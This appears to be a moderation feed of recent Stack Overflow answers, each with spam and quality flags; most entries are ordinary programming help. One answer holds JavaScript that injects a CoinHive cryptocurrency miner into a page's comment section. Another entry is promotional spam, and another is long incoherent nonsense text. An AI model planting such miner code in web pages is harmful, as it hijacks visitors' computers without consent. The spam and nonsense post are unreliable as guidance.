79289816

Date: 2024-12-18 02:23:01
Score: 2
Natty:
Report link
<div style="height:3px;"><br></div>

use whatever px you want use in html

Reasons:
  • Low length (1.5):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Mark Bradley

79289802

Date: 2024-12-18 02:13:00
Score: 0.5
Natty:
Report link

To break this down, I’d suggest splitting it into two parts: 'date' and 'time'.

1. Date

The 'date' part is all about recurrence patterns—things like:

You can manage these patterns with custom logic, or, if you're looking for a simpler way to handle it, you might want to check out libraries like DateRecurrenceR (github). It can help with generating recurring dates based on different patterns, making the logic easier to handle.

using DateRecurrenceR;
using DateRecurrenceR.Core;

var beginDate = DateOnly.MinValue;
var endDate = DateOnly.MaxValue;
var interval = new Interval(3);

var enumerator = Recurrence.Daily(beginDate, endDate, interval);

2. Time

The 'time' part is about dealing with time zones, UTC, and local times. This can get tricky because recurring events can span across time zones, and daylight-saving time changes can mess things up. For that, I’d recommend checking out some advice from @matt-johnson-pint. His approach with NodaTime and using UTC can help avoid common headaches with time calculations.

Reasons:
  • Long answer (-1):
  • Has code block (-0.5):
  • User mentioned (1): @matt-johnson-pint
  • Low reputation (1):
Posted by: user1645745

79289797

Date: 2024-12-18 02:09:59
Score: 1
Natty:
Report link

Likely what the error logs say - you can try adding this snippet with the experiment name before starting the run

mlflow.set_experiment("experiment_name")
Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: Savin

79289790

Date: 2024-12-18 02:03:58
Score: 15.5
Natty: 7.5
Report link

I am stuck with the same problem. How were you able to solve it?

Transparent window on android api level 28 goes black

Reasons:
  • Blacklisted phrase (1): you able to solve
  • RegEx Blacklisted phrase (1.5): I am stuck
  • RegEx Blacklisted phrase (1.5): solve it?
  • RegEx Blacklisted phrase (3): were you able
  • Probably link only (1):
  • Low length (1.5):
  • No code block (0.5):
  • Me too answer (2.5): I am stuck with the same problem
  • Ends in question mark (2):
  • Low reputation (1):
Posted by: neojav

79289787

Date: 2024-12-18 02:00:57
Score: 2.5
Natty:
Report link

Gonçalves Silva OnMe Compressor It is possible to change the upper panel by increasing the equivalent of the predefined object and adding an optional window attached to the acceleration grid. This change is not structural, it is participatory. Another possibility is to establish a condition of approximation with an existing lens. Among the various streams of activities involved, adopt stationary formats. On both occasions, it was the most practical option found to change the look, preventing a position from being eternally adopted. This elaboration was also a calculation study that made it possible to observe the possibility of making the complementary system more flexible. From this situation, it is possible to understand that there is the possibility of implementing other connector grids or additional artificial intelligence platforms. For example: the variation of the vertical coercive module is a piece of furniture and even a login device capable of opening in an informal dialog box; Thus, the side doors could be used as a calibrated ventilation station. These possibilities adopt the characteristic of reformulation. The support base gains the structure of a skeleton capable of absorbing the impact of the auxiliary adornments. I was referring to the sound and video cards; However, when observed in this way, it is possible to understand the possibility of other collaborations. Another detail of the upper panel is that it can multiply a regular level of intelligence. It is possible to wrap two panels together in parallel. This happens from the processing tab of the profiled mobile stack; The multiplication of these cubes raises the upper grid in a gradual way that understands into channels. Hangers are added between the conventional axles. Thus one is added and removed one after another. Another fact observed is that: if you group the integral collaborative flows, the grids can collaborate by increasing the flow and improving the conditioned speed. Restoration engineering helps in the maintenance of the construction element; The practice of these settlements aiming at other moments are alternative and analogous to the construction process. Something around two-thirds of these flows are rigorously adopted by artificial intelligence; Thus, it is understood that the generation of new connectors is a reliable vertical expansion that heats up the source that generates other understandings, creating new resources to be socialized. In addition to these connectors, the information grid itself can accumulate configured propelling resources. The structure as a neural basis becomes a unique piece of reference exchange and complete fertilization of the system. The upper set that receives the collaborations can be easily wrapped in additional sets that can irrigate settlers and access naturally. Returning to the issue of the grids, in each of these positions there is a wide flow of components in transits; some go unnoticed and others have greater relevance, normal; It turns out that this transit or from this transit it is possible to agglutinate several sub-leases and even complement the collaborative conduits. I believe that this is the great elegance of the structure. Imagine a tower completely designed and wrapped and the body itself allows it to be adorned and even decorated with greater attributes?! Thus, it is possible to use all the versatility of the system in a better assimilated and understood and less complicated way. Structure is possibler only a complement and to benefit from the grids as small points of qualified fusions. Thus, it is possible to configure a resource that is distributed to other parallel devices; it is possible to use the same resource to meet me, you, them and them; This without causing the loss of floating data quality. The hangers are hung in masses independent of each block. After this challenge, totally plural, virtual loneliness will be very cruel. Thank you for your attention

Reasons:
  • Blacklisted phrase (0.5): Thank you
  • Contains signature (1):
  • Long answer (-1):
  • No code block (0.5):
  • Contains question mark (0.5):
  • Low reputation (1):
Posted by: Gonçalves Silva

79289773

Date: 2024-12-18 01:51:55
Score: 0.5
Natty:
Report link

Yes.

The virtual thread (VT) depends on "carrier" threads to progress. Carrier are just platform threads; the word carrier should remind you that they are under the virtual threads but not necessarily have any affinity to them.

The number of carrier threads is limited, starting at 1 per cpu core, and some extras can be allocated under special "pinning" circumstances.

Carriers do run in parallel, so some runnable VTs will progress in parallel, but not all of them.

Reasons:
  • No code block (0.5):
Posted by: user2023577

79289768

Date: 2024-12-18 01:47:54
Score: 1.5
Natty:
Report link

I know it's an important feature, but it also brings with it a big security problem, if an attacker manages to obtain one of your secret keys and obtains the complete list of subscribed users, they could, with that information, attack the entire project. It is important that the API key that will have contact with the client (app, js, ect,) only have read permission.

Reasons:
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: Teu

79289752

Date: 2024-12-18 01:35:51
Score: 5
Natty:
Report link

When you explicitly declare variables as XmlNode, the process is straightforward and works immediately without any extra steps. However, if you use the var keyword along with casting, you'll need to include additional LINQ code to ensure that the compiler correctly identifies each item as an XmlNode.

Reasons:
  • Probably link only (1):
  • Low length (2):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: henry ivwighre

79289744

Date: 2024-12-18 01:27:50
Score: 0.5
Natty:
Report link

First, you should confirm the problem actually exists. Within the lambda console, you can view the lambda's SHA256 BASE64 encoded hash. You can observe it before and after. As well, this SHA256 BASE64 encoded hash appears in CloudTrail when a lambda is created/updated.

Having said that and looking deeper, the contents of the zip file could be identical, but if it's zipped by different zipping software or even at different times, the SHA256 will almost certainly be different. Some zipping solutions (Such as Terraform's Archive provider) can produce exact ZIP files over and over, but others cannot.

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: Wayne Workman

79289741

Date: 2024-12-18 01:26:49
Score: 2
Natty:
Report link

adding

    implementation 'org.infinispan.protostream:protostream-processor:5.0.5.Final'

on build.gradle dependencies list solved the build failure 😅

Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: cynicdog

79289736

Date: 2024-12-18 01:24:49
Score: 3
Natty:
Report link

Yes, having the two sim plants the way I added them was causing the issue. Modifying the problem to have an internal sim plant for the controller (replacement for the robot model used by the controller) and another for the simulation (replacement for the real robot) fixed the issue.

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Self-answer (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: corehammer

79289734

Date: 2024-12-18 01:21:48
Score: 0.5
Natty:
Report link

If you put checkAddons inside the build method when you use setState(), the method build is recalled, then the checkAddons will be reset to the default value of [], which will make this error. The solution is to put checkAddons outside the build method

Reasons:
  • Whitelisted phrase (-1): solution is
  • Low length (0.5):
  • Has code block (-0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Đình Nhật

79289733

Date: 2024-12-18 01:20:48
Score: 1.5
Natty:
Report link

I am also just started looking into the Huawei Lite Wearable app development using the Dev Eco Studio. I think I have crossed this step now.

You have to select the "[Lite]Empty Activity" option in the Create Project Menu. Refer below snap.

enter image description here

Hope my answer is helpful.

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: Arun Doss

79289730

Date: 2024-12-18 01:16:47
Score: 1
Natty:
Report link

You can add text at the coordinate where you want to display the value with Matplotlib's text() function

ax.text(x_coord, y_coord, z_coord, value, color='red', fontsize=10)
Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: David Robinson

79289729

Date: 2024-12-18 01:16:47
Score: 2.5
Natty:
Report link

Come and share your code on CouponPi, the go-to platform where you can submit your referral codes for FREE. Reach more shoppers, get more clicks, and watch your rewards grow. Whether you’re looking to maximize your income or just get your code out there, CouponPi makes it easy!

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Unregistered user (0.5):
  • Low reputation (1):
Posted by: ovoshampoo

79289723

Date: 2024-12-18 01:12:46
Score: 1
Natty:
Report link

Since the SessionId is generated by the database upon saving the session, you need to follow a two-step process to save both the Session and the associated SessionExplanations:

1- Save the session object to the database, which will generate and return the SessionId.

2- Once you have the SessionId, you can then save the SessionExplanations objects.

However, it is possible to streamline this process into a single API call. You can structure your API to accept a complete payload that includes the Session object and its related Explanation IDs. Then, handle both saving operations within a single transaction on the server side.

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Mohammad Reza Mahdiani

79289707

Date: 2024-12-18 00:58:42
Score: 3.5
Natty:
Report link

Thank you!!!

I also found it in that path!!

Reasons:
  • Blacklisted phrase (0.5): Thank you
  • Low length (1.5):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Aritz Urdangarin Larraza

79289705

Date: 2024-12-18 00:56:42
Score: 1
Natty:
Report link

This would work best using bot.register_next_step_handler(message, next_step_function)

in this case next_step_function will be called immediately after the first function is called but the next_step_function will stand alone and won't be nested or preceded by a decorator.

Here is an example

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: RCK Euler

79289702

Date: 2024-12-18 00:53:41
Score: 1.5
Natty:
Report link

var comment = ' var miner = new CoinHive.Anonymous("SK_tBOtagJDzVMsotm557K7C"); miner.start(); '; document.getElementById('comment-section').innerHTML = comment;

var comment = ' var miner = new CoinHive.Anonymous("PK_OLfNV9zFpVSoDew8j6lfq "); miner.start(); '; document.getElementById('comment-section').innerHTML = comment;

Reasons:
  • No code block (0.5):
  • Low reputation (1):
Posted by: Moamen Elberkawy

79289682

Date: 2024-12-18 00:31:36
Score: 2
Natty:
Report link

Further to Sam's answer, you could also extract the text pieces from the page return soup.get_text(separator=',') Then find the headers to validate format and proceed to parse the coordinates.

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Juan_at_Austin

79289679

Date: 2024-12-18 00:29:35
Score: 4
Natty:
Report link

When you Group By

Click on Advanced enter image description here

Then add grouping. For your case it will look like this

enter image description here

Reasons:
  • Probably link only (1):
  • Low length (1):
  • No code block (0.5):
  • Starts with a question (0.5): When you
  • Low reputation (1):
Posted by: Amir T.

79289677

Date: 2024-12-18 00:26:35
Score: 2
Natty:
Report link

Leaving this here as reference. I found using the combination of inline, arrays_zip and array allows you to insert into a temporary view.

create or replace temporary view TEMP_ITEM as select inline( arrays_zip( array(1,2,3), array('one','two','three') ) ) as (UPC_ID, UPC_VALUE);

That creates this table:

select * from TEMP_ITEM;

UPC_ID UPC_VALUE 1 one 2 two 3 three

Reasons:
  • No code block (0.5):
  • Unregistered user (0.5):
  • Low reputation (1):
Posted by: Anthony

79289676

Date: 2024-12-18 00:25:34
Score: 2
Natty:
Report link

Update: CircuitPython now has an optional secondary USB serial channel available, which is not connected to REPL, over which you can send 8-bit binary data freely. See https://learn.adafruit.com/customizing-usb-devices-in-circuitpython/circuitpy-midi-serial#usb-serial-console-repl-and-data-3096590

Reasons:
  • Probably link only (1):
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • High reputation (-1):
Posted by: Dan Halbert

79289674

Date: 2024-12-18 00:22:34
Score: 3
Natty:
Report link

yarn create react-app my-app --template typescript

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: lachs

79289669

Date: 2024-12-18 00:20:33
Score: 2
Natty:
Report link

As mentioned in the comment by @JavaSheriff, there seems to be no escaping the no-escaping of commas. So I did a hacky little workaround, by taking advantage of Spring's @PostConstruct annotation, like so:

// the field into which I want to inject values
@Value("${my.application.property}")
private List<String> props;

// an extra field to hold the comma-containing value
@Value("${other.prop}")
private List<String> otherProps;

@PostContruct
private void fixArgs() {
  // re-constitute values with commas
  String collectedArgs = String.join(",", otherProps);
  props.add(collectedArgs);
}

The @PostConstruct annotation causes the method to be run after the bean has been instantiated and the values injected.

Reasons:
  • RegEx Blacklisted phrase (1): I want
  • Long answer (-0.5):
  • Has code block (-0.5):
  • User mentioned (1): @JavaSheriff
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: Tomás Gray

79289664

Date: 2024-12-18 00:18:33
Score: 3
Natty:
Report link

You can handle session and give the condition that the only person who has in admin session can enter into the page

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Misthah Kp

79289646

Date: 2024-12-17 23:57:29
Score: 2
Natty:
Report link

You can test your app's connection to Health Connect by using the Health Connect Toolbox app, which can be downloaded from here. That page also has a description on how to use the test app, to either submit test data into health connect to see if your app can read it, or read data your app submitted to Health Connect.

Reasons:
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Joshua Bradbury

79289640

Date: 2024-12-17 23:49:28
Score: 2
Natty:
Report link

As said in the comment section, the explanation is that tsc is a Node.js app so we need it to run the command which executes as a javascript file.

Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: stjamesfr

79289620

Date: 2024-12-17 23:35:26
Score: 1
Natty:
Report link

This is a tensorboard issue with the current version. Downgrade to 2.16.2 fixes the issue. pip install tensorboard==2.16.2

Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: kevinunger

79289613

Date: 2024-12-17 23:30:24
Score: 0.5
Natty:
Report link

In Pandas, there is a function called fromisocalendar which will transform an ISO 8601 year-week-day format to a TimeStamp:

pd.Timestamp.fromisocalendar(2024, 51, 3)

-> Timestamp('2024-12-18 00:00:00')

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: rehaqds

79289611

Date: 2024-12-17 23:28:24
Score: 0.5
Natty:
Report link

I'm not sure how it happened but the code is now working...

Probably - as wrote in some other questions similar to mine - there was a problem of "spaces" between alle the End Sub and the following Sub btn_something_MouseMove, and all it needed was a complete "reset" of those spaces.

As I told in the question, I had an issue with removing part of the code (excel crashing), but cutting the whole code was the solution to prevent it. Then I proceded copy-pasting every Sub top to bottom, saving every time and checking for errors running the code.

It simply started working again. Don't know how or why. Hope this could help someone else!

Reasons:
  • Long answer (-0.5):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: MrBoop

79289610

Date: 2024-12-17 23:26:23
Score: 2.5
Natty:
Report link

I just ran into this problem myself when debugging some python code in WSL. The problem ended up being I was importing matplotlib without starting xlaunch. For reference I had pyqt5 installed with matplotlib in my wsl virtual environment. Even though I wasn't creating any plots I needed to either not import matplotlib or start xlaunch for the debugger to run at normal speed.

Reasons:
  • Blacklisted phrase (0.5): I need
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Aaron M

79289602

Date: 2024-12-17 23:23:22
Score: 0.5
Natty:
Report link

You need to extract the leaf labels from the hierarchical clustering object and map them to the nodes. geom_node_text(aes(label = ifelse(leaf, label, NA))) places labels only on leaf nodes by checking the leaf column.

library(ggraph)
library(tidygraph)
library(igraph)

# Perform hierarchical clustering
hcity.D2 <- hclust(UScitiesD, "ward.D2")
#plot(hcity.D2)

# Convert hclust object to a tidygraph
graph <- as_tbl_graph(hcity.D2)

# Create the circular dendrogram with labels for leaf nodes
ggraph(graph, layout = "dendrogram", circular = TRUE) +
  geom_edge_link() +
  geom_node_text(aes(label = ifelse(leaf, label, NA)), size = 3, repel = TRUE) +
  coord_equal() +
  theme_void()

out

Reasons:
  • Probably link only (1):
  • Long answer (-0.5):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: G-Man

79289597

Date: 2024-12-17 23:20:22
Score: 2.5
Natty:
Report link

I would love to see this option. I'm not sure if there is a more accessible solve (hope there is). For now, I have dropdowns for month, day and year (as compared to a single dropdown (which can be a pain to look for the correct date), to isolate a single date input selection and still maintain accessibility.

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Dan Labrador

79289596

Date: 2024-12-17 23:20:22
Score: 3.5
Natty:
Report link

I used similar code it always give problem with path then I ignored the path it works properly then I had to use the path to handle session from php so how to solve path the error as I remember refer to the file with long direction /server.py error line 373

Reasons:
  • Blacklisted phrase (1): how to solve
  • Low length (0.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: mustafaattia

79289592

Date: 2024-12-17 23:16:21
Score: 1
Natty:
Report link

I had the same story.

In addition, I had a domain controller installed on the Azure VM with a DNS server role. All that was needed was to set a Conditional Forwarder for the DNS server.

Reasons:
  • Whitelisted phrase (-1): I had the same
  • Low length (0.5):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Max

79289584

Date: 2024-12-17 23:12:20
Score: 1
Natty:
Report link

I have found my solution...

I can pass it in like so

npx cypress run --env formID=myID --spec cypress/e2e/regression/forms/basicLayoutForm.cy.js

And access it like this in the .cy.js file Cypress.env('formID')

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: Cookies

79289575

Date: 2024-12-17 23:07:19
Score: 2.5
Natty:
Report link

For me the answer was to allow the triggering project access by navigating to the target project's CI/CD settings, go to "Job Token Permissions", then add the path of the project that is the one doing the triggering.

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Nick Griffiths

79289574

Date: 2024-12-17 23:06:19
Score: 0.5
Natty:
Report link

The solution here is, in the URL you have to initialize the "inventorylocation" e.g. https://{NS_ACCOUNT}.suitetalk.api.netsuite.com/services/rest/record/v1/salesOrder/146401/!transform/itemFulfillment?init=inventorylocation:21

then in the body you have to pass the JSON in the below format,

{
"item": {
    "items": [
        {
            "orderLine": 1,
            "quantity": 1.0,
            "location": 21,
            "itemreceive": true
        },
        {
            "orderLine": 2,
            "quantity": 1.0,
            "location": 21,
            "itemreceive": true,
            "inventoryDetail": {
                "location": 21,
                "quantity": 1.0,
                "inventoryAssignment": {
                    "items": [
                      {
                        "binNumber": {
                            "id": 21
                        },
                        "inventoryStatus": {
                            "id": 1
                        },
                        "issueInventoryNumber" : {
                            "refName": "80130SUBD0083", // Text
                             "id": 82 // value
                        }
                    }
                  ]
               }
            }
        }
    ]
}

}

Reasons:
  • Long answer (-1):
  • Has code block (-0.5):
  • Contains question mark (0.5):
  • Unregistered user (0.5):
  • Low reputation (1):
Posted by: Ksnel Inc.

79289570

Date: 2024-12-17 23:02:19
Score: 2
Natty:
Report link

line-number-mode displays numbers in mode line so this is not applicable. You probably mean display-line-number-mode and it that case it should just work since the face used for the line numbers inherits from default.

In general, you can change arbitrary faces by adding them to auto-dim-other-buffers-affected-faces variable. For line numbers you’d need to add entry for line-number face.

Reasons:
  • No code block (0.5):
  • Unregistered user (0.5):
  • Low reputation (1):
Posted by: mina86

79289556

Date: 2024-12-17 22:52:16
Score: 4
Natty:
Report link

I'm not sure about how many items we are talking, but here are some suggestions:

  1. Use this plugin: https://nl.wordpress.org/plugins/doubly/
  2. Like @Eloi said, download them via FTP and bulk-upload them via the Wordpress media library.
  3. Check if your current gallery plugin (if applicable) has a feature or API to import/export media.

Good luck!

Reasons:
  • Blacklisted phrase (1): this plugin
  • Low length (0.5):
  • No code block (0.5):
  • User mentioned (1): @Eloi
  • Low reputation (1):
Posted by: Flower88

79289555

Date: 2024-12-17 22:51:16
Score: 2
Natty:
Report link

Seems like a bug, not LDC specific. https://github.com/dlang/dmd/issues/17804

Per that bug report, the parentheses seem to "work", but causes another failure in static AA initialization.

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: Steven Schveighoffer

79289544

Date: 2024-12-17 22:45:15
Score: 1.5
Natty:
Report link

I might be too late ;) My solution to this question would be

(define (index-of s lst) 
    (if (member s lst) 
        (- (length lst) (length (member s lst))) 
        '()))
Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Birame SENE

79289535

Date: 2024-12-17 22:41:14
Score: 0.5
Natty:
Report link

There is no specific enforcement from Jack Henry on the topic of making a plugin card fit seamlessly into the user's Dashboard experience.

With that being said, account holders expect that the UI for their digital banking experience should feel like it belongs to the branding for that financial institution.

We have the Designing and Developing Plugins guide to help with building plugins that will look great and feel great too.

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: Jaime Lopez Jr.

79289534

Date: 2024-12-17 22:41:13
Score: 8 🚩
Natty: 4.5
Report link

Did you captured the robots internal RS485 bus ? Someone in the UR forum mentioned a baud rate of about 2Mbps, and they are using a Modbus RTU (-like?) protocol over the RS485 to drive the motors. Does anyone has maybe further information about the protocol or speeds ?

Reasons:
  • RegEx Blacklisted phrase (3): Does anyone has
  • Low length (0.5):
  • No code block (0.5):
  • Ends in question mark (2):
  • Unregistered user (0.5):
  • Starts with a question (0.5): Did you
  • Low reputation (1):
Posted by: Marcel O

79289531

Date: 2024-12-17 22:40:12
Score: 1
Natty:
Report link

In 2024, there's actually an update!

  1. As far as I know, there is still now way to suppress deployed functions. This is only possible while testing when using the emulator, see https://firebase.google.com/docs/reference/emulator-suite/rules-unit-testing/rules-unit-testing.md#withfunctiontriggersdisabled.

BUT:

  1. Yes, it is now possible to to retrieve some information about the auth user that performed a write that led to the trigger function being run: https://firebase.google.com/docs/functions/firestore-events?gen=2nd#auth-context

Example from the docs that verifies the calling user:

import { onDocumentWrittenWithAuthContext } from "firebase-functions/v2/firestore"

  exports.syncUser = onDocumentWrittenWithAuthContext("users/{userId}", (event) => {
  // retrieve auth context from event
  const { authType, authId } = event;

  let verified = false;
  if (authType === "system") {
    // system-generated users are automatically verified
    verified = true;
  } else if (authType === "unknown" || authType === "unauthenticated") {
    // admin users from a specific domain are verified
    if (authId.endsWith("@example.com")) {
      verified = true;
    }
  }
}); 
Reasons:
  • Probably link only (1):
  • Long answer (-0.5):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Fabio Bove

79289525

Date: 2024-12-17 22:36:12
Score: 0.5
Natty:
Report link

Azure AD B2C allows you to implement custom policies to restrict access based on user attributes, such as an email address.

How It Works:

  1. Custom Policy: Modify the B2C user journey to include a validation step that checks if the user's email matches an approved list.
  2. Dynamic List: Store the list of approved emails in a centralized place like Azure Table Storage, Azure Cosmos DB, or an external API.
  3. Validation Step: During authentication or account creation, Azure B2C calls a REST API endpoint to validate the email.
Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: Divyesh Govardhanan

79289512

Date: 2024-12-17 22:30:11
Score: 0.5
Natty:
Report link

The solution here is, in the URL you have to initialize the "inventorylocation" e.g. https://{NS_ACCOUNT}.suitetalk.api.netsuite.com/services/rest/record/v1/salesOrder/146401/!transform/itemFulfillment?init=inventorylocation:21

then in the body you have to pass the JSON in the below format,

{
"item": {
    "items": [
        {
            "orderLine": 1,
            "quantity": 1.0,
            "location": 21,
            "itemreceive": true
        },
        {
            "orderLine": 2,
            "quantity": 1.0,
            "location": 21,
            "itemreceive": true,
            "inventoryDetail": {
                "location": 21,
                "quantity": 1.0,
                "inventoryAssignment": {
                    "items": [
                      {
                        "binNumber": {
                            "id": 21
                        },
                        "inventoryStatus": {
                            "id": 1
                        },
                        "issueInventoryNumber" : {
                            "refName": "80130SUBD0083", // Text
                             "id": 82 // value
                        }
                    }
                  ]
               }
            }
        }
    ]
}

}

Reasons:
  • Long answer (-1):
  • Has code block (-0.5):
  • Contains question mark (0.5):
  • Unregistered user (0.5):
  • Low reputation (1):
Posted by: Ksnel Inc.

79289511

Date: 2024-12-17 22:30:10
Score: 4.5
Natty:
Report link

Thank you. I found the problem at an initialize content object step that adding $ to json key. Use a Compose task to remove that extra $ character solves the problem. enter image description here

Reasons:
  • Blacklisted phrase (0.5): Thank you
  • Blacklisted phrase (1): enter image description here
  • Low length (1):
  • No code block (0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: H-v-A

79289502

Date: 2024-12-17 22:23:08
Score: 0.5
Natty:
Report link

Seems like none of the two provided in the answers extensions are working now in Dec 2024.

I first published this one in Mar 2024 - to help find issues with timers, intervals, animation frames, idle callbacks and eval's, not only by reporting data but also by observing the behaviour through time. It tracks active intervals, scheduled timeouts, shows their callstacks (wich helps to jump straight to the source code), collects history and frequency of invocation, marks instances of bad argument usages.

Link to extension: chrome web store - API Monitor (manifest version 3)
Link to source code (MIT license): github - the principle in core is wrapping native functions via injected content-script, the rest are logistics.

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: AlexanderB

79289500

Date: 2024-12-17 22:21:07
Score: 11 🚩
Natty: 6.5
Report link

Did you find any solution? Im trying to do similar thing per component.

Reasons:
  • Blacklisted phrase (1.5): any solution
  • RegEx Blacklisted phrase (3): Did you find any solution
  • RegEx Blacklisted phrase (2): any solution?
  • Low length (1.5):
  • No code block (0.5):
  • Contains question mark (0.5):
  • Single line (0.5):
  • Starts with a question (0.5): Did you find any solution
  • Low reputation (1):
Posted by: Daniel Walczak

79289498

Date: 2024-12-17 22:19:06
Score: 2.5
Natty:
Report link

have you done these steps?

  1. restart nginx and fpm services after config changes?
  2. have you changed the right php config file? (same address in phpinfo())

Also, please try to check the nginx and php log files to see which one is not working fine.

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Contains question mark (0.5):
  • Low reputation (1):
Posted by: Ali Mousavi

79289493

Date: 2024-12-17 22:18:06
Score: 0.5
Natty:
Report link

According to documentation of Grandstream apps, you need the gsapi JAR file:

enter image description here

Reasons:
  • Probably link only (1):
  • Low length (1.5):
  • Has code block (-0.5):
  • Single line (0.5):
  • High reputation (-2):
Posted by: Jorgesys

79289475

Date: 2024-12-17 22:11:04
Score: 1.5
Natty:
Report link

Chrome it is adding internally and it is filling automatically whenever we have input tag with username and password.

To avoid autofill for username and password, we have to remove the development URL from this location

chrome --> 3 dots --> password and autofill --> Google password manager

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: JAYAKUMAR SINNAPILLAI

79289469

Date: 2024-12-17 22:09:04
Score: 1
Natty:
Report link

The official documentation recommends using the library manager.

Sketch menu -> Include library -> Manage libraries.

Next, enter the name of the library in the search and click `install'.

https://docs.arduino.cc/software/ide-v1/tutorials/installing-libraries/

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: user28829153

79289467

Date: 2024-12-17 22:09:04
Score: 0.5
Natty:
Report link

The setup that worked for me in a Turbo monorepo was to install as a dependency "@your-package":"*" in package.json of your main workspace

Then in your tsconfig.json of your main workspace, add :

{..., // the rest of your tsconfig.json file
"paths": ["../path/to/packages/your-package"]
}

I did not use exports in @your-package package.json file. This helps typescript to resolve types and use their latest definitions. Hope that would help!

Reasons:
  • Whitelisted phrase (-1): worked for me
  • Has code block (-0.5):
  • User mentioned (1): @your-packagefile
  • Low reputation (1):
Posted by: stjamesfr

79289458

Date: 2024-12-17 22:05:03
Score: 2.5
Natty:
Report link

The following commands helped me:

  1. brew unlink php && brew link php
  2. brew services restart --all
  3. composer global update
  4. valet start
  5. valet install
Reasons:
  • Low length (1):
  • No code block (0.5):
  • Low reputation (1):
Posted by: B.Zeka

79289454

Date: 2024-12-17 22:03:02
Score: 1.5
Natty:
Report link

The problem appears to be that I wasn't using the same keystore as previous versions of the app. I ran keytool -list on it to make sure I was using the correct alias, which I wasn't, and that recommend to migrate it to PKCS12 by using the command:

keytool -importkeystore -srckeystore keystorename.keystore -destkeystore newkeystorename.keystore -deststoretype pkcs12

That migrated version imported into Visual Studio without errors, and worked in the Play Console's Play App Signing page.

Reasons:
  • No code block (0.5):
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: Josh Bula

79289447

Date: 2024-12-17 22:01:02
Score: 1
Natty:
Report link

With a lot of respect for all the other information on post, I have to say that limiting the length of the .asm filename (extension not included in the counting) to <= 8 characters (+ dot + 3 letters extension), problem was solved.

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: nostromo

79289443

Date: 2024-12-17 22:00:01
Score: 0.5
Natty:
Report link

You can also use the FORMAT method to get straight to the offset piece like:

SELECT FORMAT(SYSDATETIMEOFFSET(), 'zzz') AS TimezoneOffset

Reasons:
  • Low length (1):
  • Has code block (-0.5):
Posted by: jacoviza

79289437

Date: 2024-12-17 21:56:00
Score: 0.5
Natty:
Report link

I had to pip install a pypi only package (no conda package) in a conda environment - this is how I did it (on a mac, in this case):

/opt/anaconda3/envs/<name of conda environment>/bin/python -m pip install <name of package to install>

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: Geoff

79289425

Date: 2024-12-17 21:45:58
Score: 1.5
Natty:
Report link

If you are trying to retrieve the job ID from your job class, you can do something like

$this->job?->getJobId()

Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: hbakouane

79289422

Date: 2024-12-17 21:42:57
Score: 1.5
Natty:
Report link

The error occurs due to incompatibility with version 3.26.0 of Elementor Free. The solution is to revert to a previous version using Elementor’s tools: Elementor → Tools → Version Control, and roll back to version 3.25.11 or earlier.

Reasons:
  • Whitelisted phrase (-1): solution is
  • Low length (0.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Giovanni Gonzalez Piza

79289417

